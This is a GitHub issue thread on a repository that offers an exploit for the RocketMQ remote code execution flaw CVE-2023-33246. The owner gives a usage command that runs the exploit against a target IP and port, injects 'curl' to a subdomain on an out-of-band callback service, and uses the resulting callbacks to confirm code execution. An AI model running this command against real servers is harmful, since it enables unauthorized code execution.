search

Malayke / CVE-2023-33246_RocketMQ_RCE_EXPLOIT

CVE-2023-33246 RocketMQ RCE Detect By Version and Exploit
Apache License 2.0
98 stars 21 forks source link

help or any advice #1

Open conneciton360 opened 1 year ago

conneciton360 commented 1 year ago

thank for code; but I after run your code get empty response. do you have advice for help?

Malayke commented 1 year ago

which script did you run? check.py or CVE-2023-33246_RocketMQ_RCE_EXPLOIT.py?

if you running CVE-2023-33246_RocketMQ_RCE_EXPLOIT.py, exploiting this vulnerability will not directly respond code execution result.

you can go to https://app.interactsh.com/, grab a subdomain like RANDOM_STRING.oast.fun

then construct exploit params like

python3 CVE-2023-33246_RocketMQ_RCE_EXPLOIT.py <YOUR_ROCKETMQ_LISTEN_IP_ADDRESS> <ROCKETMQ_LISTEN_PORT> curl RANDOM_STRING.oast.fun/test

if the exploit is successful, you can see some HTTP and DNS requests in https://app.interactsh.com/